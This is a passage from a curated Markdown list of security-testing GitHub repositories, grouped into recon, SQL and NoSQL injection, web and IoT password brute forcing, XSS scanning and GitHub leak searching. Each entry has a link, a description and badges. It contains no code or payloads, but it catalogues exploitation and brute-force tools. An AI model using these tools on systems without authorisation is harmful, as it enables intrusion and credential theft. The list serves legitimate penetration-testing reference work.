> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m4ll0k/takeover?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m4ll0k/takeover?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m4ll0k/takeover?style=flat-square) ![GitHub](https://img.shields.io/github/license/m4ll0k/takeover?style=flat-square)
- https://github.com/v4d1/Dome - **Active and/or passive scan to obtain subdomains and search for open port**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/v4d1/Dome?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/v4d1/Dome?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/v4d1/Dome?style=flat-square) ![GitHub](https://img.shields.io/github/license/v4d1/Dome?style=flat-square)
- https://github.com/cramppet/regulator - **Automated subdomain enumeration tool by learning of regexes for DNS discovery**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cramppet/regulator?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cramppet/regulator?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cramppet/regulator?style=flat-square) ![GitHub](https://img.shields.io/github/license/cramppet/regulator?style=flat-square)
- https://github.com/D3Ext/AORT - **All in One Recon Tool for domains**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/D3Ext/AORT?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/D3Ext/AORT?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/D3Ext/AORT?style=flat-square) ![GitHub](https://img.shields.io/github/license/D3Ext/AORT?style=flat-square)
### Database SQL Injection Vulnerability or Brute Force
- https://github.com/0xbug/SQLiScanner - **A SQLi vulnerability scanner via SQLMAP and Charles**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0xbug/SQLiScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0xbug/SQLiScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0xbug/SQLiScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/0xbug/SQLiScanner?style=flat-square)
- https://github.com/stamparm/DSSS - **A SQLi vulnerability scanner with 99 lines of code**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stamparm/DSSS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/stamparm/DSSS?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/stamparm/DSSS?style=flat-square) ![GitHub](https://img.shields.io/github/license/stamparm/DSSS?style=flat-square)
- https://github.com/youngyangyang04/NoSQLAttack - **A SQLi vulnerability scanner for mongoDB**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stamparm/DSSS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/youngyangyang04/NoSQLAttack?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/youngyangyang04/NoSQLAttack?style=flat-square) ![GitHub](https://img.shields.io/github/license/youngyangyang04/NoSQLAttack?style=flat-square)
- https://github.com/Neohapsis/bbqsql - **A blind SQLi vulnerability scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Neohapsis/bbqsql?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Neohapsis/bbqsql?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Neohapsis/bbqsql?style=flat-square) ![GitHub](https://img.shields.io/github/license/Neohapsis/bbqsql?style=flat-square)
- https://github.com/NetSPI/PowerUpSQL - **A SQLi vulnerability scanner with Powershell script**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PowerShell-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/NetSPI/PowerUpSQL?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/NetSPI/PowerUpSQL?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/NetSPI/PowerUpSQL?style=flat-square) ![GitHub](https://img.shields.io/github/license/NetSPI/PowerUpSQL?style=flat-square)
- https://github.com/WhitewidowScanner/whitewidow - **Another SQL vulnerability scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/WhitewidowScanner/whitewidow?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/WhitewidowScanner/whitewidow?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/WhitewidowScanner/whitewidow?style=flat-square) ![GitHub](https://img.shields.io/github/license/WhitewidowScanner/whitewidow?style=flat-square)
- https://github.com/stampery/mongoaudit - **A powerful MongoDB auditing and pentesting tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stampery/mongoaudit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/stampery/mongoaudit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/stampery/mongoaudit?style=flat-square) ![GitHub](https://img.shields.io/github/license/stampery/mongoaudit?style=flat-square)
- https://github.com/torque59/Nosql-Exploitation-Framework - **A Python framework For NoSQL scanning and exploitation**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stampery/mongoaudit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/stampery/mongoaudit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/stampery/mongoaudit?style=flat-square) ![GitHub](https://img.shields.io/github/license/stampery/mongoaudit?style=flat-square)
- https://github.com/missDronio/blindy - **Simple script to automate brutforcing blind sql injection vulnerabilities**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/missDronio/blindy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/missDronio/blindy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/missDronio/blindy?style=flat-square) ![GitHub](https://img.shields.io/github/license/missDronio/blindy?style=flat-square)
- https://github.com/fengxuangit/Fox-scan - **A initiative and passive SQL injection vulnerable test tools**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/fengxuangit/Fox-scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/fengxuangit/Fox-scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/fengxuangit/Fox-scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/fengxuangit/Fox-scan?style=flat-square)
- https://github.com/JohnTroony/Blisqy - **Exploit time-based blind-SQL injection in HTTP-Headers**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/JohnTroony/Blisqy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/JohnTroony/Blisqy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/JohnTroony/Blisqy?style=flat-square) ![GitHub](https://img.shields.io/github/license/JohnTroony/Blisqy?style=flat-square)
- https://github.com/ron190/jsql-injection - **A lightweight application used to find database information from a distant server**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ron190/jsql-injection?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ron190/jsql-injection?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ron190/jsql-injection?style=flat-square) ![GitHub](https://img.shields.io/github/license/ron190/jsql-injection?style=flat-square)
- https://github.com/Hadesy2k/sqliv - **Massive SQL injection vulnerability scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Hadesy2k/sqliv?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Hadesy2k/sqliv?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Hadesy2k/sqliv?style=flat-square) ![GitHub](https://img.shields.io/github/license/Hadesy2k/sqliv?style=flat-square)
- https://github.com/s0md3v/sqlmate - **A friend of SQLmap which will do what you always expected from SQLmap**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/sqlmate?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/sqlmate?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/sqlmate?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/sqlmate?style=flat-square)
- https://github.com/m8r0wn/enumdb - **MySQL and MSSQL brute force and post exploitation tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m8r0wn/enumdb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m8r0wn/enumdb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m8r0wn/enumdb?style=flat-square) ![GitHub](https://img.shields.io/github/license/m8r0wn/enumdb?style=flat-square)
- https://github.com/tariqhawis/injectbot - **A web-based, easy-to-use, SQL injection scanner and exploiter tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/tariqhawis/injectbot?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/tariqhawis/injectbot?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/tariqhawis/injectbot?style=flat-square) ![GitHub](https://img.shields.io/github/license/tariqhawis/injectbot?style=flat-square)
### Weak Usernames or Passwords Enumeration For Web
- https://github.com/lijiejie/htpwdScan - **A python HTTP weak pass scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/htpwdScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/htpwdScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/htpwdScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/htpwdScan?style=flat-square)
- https://github.com/netxfly/crack_ssh - **SSH, Redis, mongoDB weak password bruteforcer**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/netxfly/crack_ssh?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/netxfly/crack_ssh?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/netxfly/crack_ssh?style=flat-square) ![GitHub](https://img.shields.io/github/license/netxfly/crack_ssh?style=flat-square)
- https://github.com/shengqi158/weak_password_detect - **A python HTTP weak password scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shengqi158/weak_password_detect?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shengqi158/weak_password_detect?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shengqi158/weak_password_detect?style=flat-square) ![GitHub](https://img.shields.io/github/license/shengqi158/weak_password_detect?style=flat-square)
- https://github.com/s0md3v/Blazy - **a modern login bruteforcer which also tests for CSRF, Clickjacking, Cloudflare and WAF**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/Blazy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/Blazy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/Blazy?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/Blazy?style=flat-square)
- https://github.com/MooseDojo/myBFF - **Web application brute force framework,supports Citrix Gateway,CiscoVPN and so on**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MooseDojo/myBFF?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MooseDojo/myBFF?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MooseDojo/myBFF?style=flat-square) ![GitHub](https://img.shields.io/github/license/MooseDojo/myBFF?style=flat-square)
- https://github.com/TideSec/web_pwd_common_crack - **A common web weak_password cracking script,can detect batches of management backgrounds without verification codes**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/web_pwd_common_crack?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/web_pwd_common_crack?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/web_pwd_common_crack?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/web_pwd_common_crack?style=flat-square)
### Authorization Brute Force or Vulnerability Scan For IoT
- https://github.com/rapid7/IoTSeeker - **Weak-password IoT devices scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rapid7/IoTSeeker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rapid7/IoTSeeker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rapid7/IoTSeeker?style=flat-square) ![GitHub](https://img.shields.io/github/license/rapid7/IoTSeeker?style=flat-square)
- https://github.com/shodan-labs/iotdb - **IoT Devices scanner via nmap**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-XML-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shodan-labs/iotdb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shodan-labs/iotdb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shodan-labs/iotdb?style=flat-square) ![GitHub](https://img.shields.io/github/license/shodan-labs/iotdb?style=flat-square)
- https://github.com/googleinurl/RouterHunterBR - **Testing vulnerabilities in devices and routers connected to the Internet**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/googleinurl/RouterHunterBR?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/googleinurl/RouterHunterBR?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/googleinurl/RouterHunterBR?style=flat-square) ![GitHub](https://img.shields.io/github/license/googleinurl/RouterHunterBR?style=flat-square)
- https://github.com/scu-igroup/telnet-scanner - **Weak telnet password scanner based on password enumeration**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/scu-igroup/telnet-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/scu-igroup/telnet-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/scu-igroup/telnet-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/scu-igroup/telnet-scanner?style=flat-square)
- https://github.com/viraintel/OWASP-Nettacker - **Network information gathering vulnerability scanner,most useful to scan IoT**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/viraintel/OWASP-Nettacker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/viraintel/OWASP-Nettacker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/viraintel/OWASP-Nettacker?style=flat-square) ![GitHub](https://img.shields.io/github/license/viraintel/OWASP-Nettacker?style=flat-square)
- https://github.com/threat9/routersploit - **Exploitation Framework for embedded Devices,such as router**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/threat9/routersploit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/threat9/routersploit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/threat9/routersploit?style=flat-square) ![GitHub](https://img.shields.io/github/license/threat9/routersploit?style=flat-square)
- https://github.com/w3h/icsmaster/tree/master/nse - **Digital bond's ICS enumeration tools**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-NSE-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/w3h/icsmaster?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/w3h/icsmaster?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/w3h/icsmaster?style=flat-square) ![GitHub](https://img.shields.io/github/license/w3h/icsmaster?style=flat-square)
- https://github.com/firmianay/firmeye - **An IDA plug-in, based on sensitive function parameter backtracking to assist in vulnerability mining**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/firmianay/firmeye?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/firmianay/firmeye?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/firmianay/firmeye?style=flat-square) ![GitHub](https://img.shields.io/github/license/firmianay/firmeye?style=flat-square)
### Mutiple types of Cross-site scripting Detection
- https://github.com/0x584A/fuzzXssPHP - **A very simple reflected XSS scanner supports GET/POST**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0x584A/fuzzXssPHP?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0x584A/fuzzXssPHP?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0x584A/fuzzXssPHP?style=flat-square) ![GitHub](https://img.shields.io/github/license/0x584A/fuzzXssPHP?style=flat-square)
- https://github.com/chuhades/xss_scan - **Reflected XSS scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chuhades/xss_scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chuhades/xss_scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chuhades/xss_scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/chuhades/xss_scan?style=flat-square)
- https://github.com/BlackHole1/autoFindXssAndCsrf - **A plugin for browser that checks automatically whether a page haves XSS and CSRF vulnerabilities**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-JavaScript-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/BlackHole1/autoFindXssAndCsrf?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/BlackHole1/autoFindXssAndCsrf?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/BlackHole1/autoFindXssAndCsrf?style=flat-square) ![GitHub](https://img.shields.io/github/license/BlackHole1/autoFindXssAndCsrf?style=flat-square)
- https://github.com/shogunlab/shuriken - **XSS command line tool for testing lists of XSS payloads on web apps**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shogunlab/shuriken?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shogunlab/shuriken?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shogunlab/shuriken?style=flat-square) ![GitHub](https://img.shields.io/github/license/shogunlab/shuriken?style=flat-square)
- https://github.com/s0md3v/XSStrike - **Fuzz and bruteforce parameters for XSS, WAFs detect and bypass**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/XSStrike?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/XSStrike?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/XSStrike?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/XSStrike?style=flat-square)
- https://github.com/stamparm/DSXS - **A fully functional cross-site scripting vulnerability scanner,supporting GET and POST parameters,and written in under 100 lines of code**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stamparm/DSXS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/stamparm/DSXS?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/stamparm/DSXS?style=flat-square) ![GitHub](https://img.shields.io/github/license/stamparm/DSXS?style=flat-square)
- https://github.com/fcavallarin/domdig - **DOM XSS scanner for Single Page Applications**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/fcavallarin/domdig?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/fcavallarin/domdig?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/fcavallarin/domdig?style=flat-square) ![GitHub](https://img.shields.io/github/license/fcavallarin/domdig?style=flat-square)
- https://github.com/lwzSoviet/NoXss - **Faster reflected-xss and dom-xss scanner based on Phantomjs**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lwzSoviet/NoXss?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lwzSoviet/NoXss?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lwzSoviet/NoXss?style=flat-square) ![GitHub](https://img.shields.io/github/license/lwzSoviet/NoXss?style=flat-square)
- https://github.com/pwn0sec/PwnXSS - **A powerful XSS scanner made in python 3.7**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/pwn0sec/PwnXSS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/pwn0sec/PwnXSS?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/pwn0sec/PwnXSS?style=flat-square) ![GitHub](https://img.shields.io/github/license/pwn0sec/PwnXSS?style=flat-square)
- https://github.com/hahwul/dalfox - **Parameter Analysis and XSS Scanning tool based on golang**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/hahwul/dalfox?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/hahwul/dalfox?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/hahwul/dalfox?style=flat-square) ![GitHub](https://img.shields.io/github/license/hahwul/dalfox?style=flat-square)
### Enterprise sensitive information Leak Scan
- https://github.com/x0day/Multisearch-v2 - **Enterprise assets collector based on search engine**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/x0day/Multisearch-v2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/x0day/Multisearch-v2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/x0day/Multisearch-v2?style=flat-square) ![GitHub](https://img.shields.io/github/license/x0day/Multisearch-v2?style=flat-square)
- https://github.com/Ekultek/Zeus-Scanner - **An advanced dork searching tool that is capable of finding IP address /URL blocked by search engine,and can run sqlmap and nmap scans on the URL's**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Ekultek/Zeus-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Ekultek/Zeus-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Ekultek/Zeus-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/Ekultek/Zeus-Scanner?style=flat-square)
- https://github.com/metac0rtex/GitHarvester - **Used for harvesting information from GitHub**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/metac0rtex/GitHarvester?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/metac0rtex/GitHarvester?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/metac0rtex/GitHarvester?style=flat-square) ![GitHub](https://img.shields.io/github/license/metac0rtex/GitHarvester?style=flat-square)
- https://github.com/repoog/GitPrey - **Searching sensitive files and contents in GitHub**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/repoog/GitPrey?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/repoog/GitPrey?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/repoog/GitPrey?style=flat-square) ![GitHub](https://img.shields.io/github/license/repoog/GitPrey?style=flat-square)
- https://github.com/0xbug/Hawkeye - **Github leak scan for enterprise**
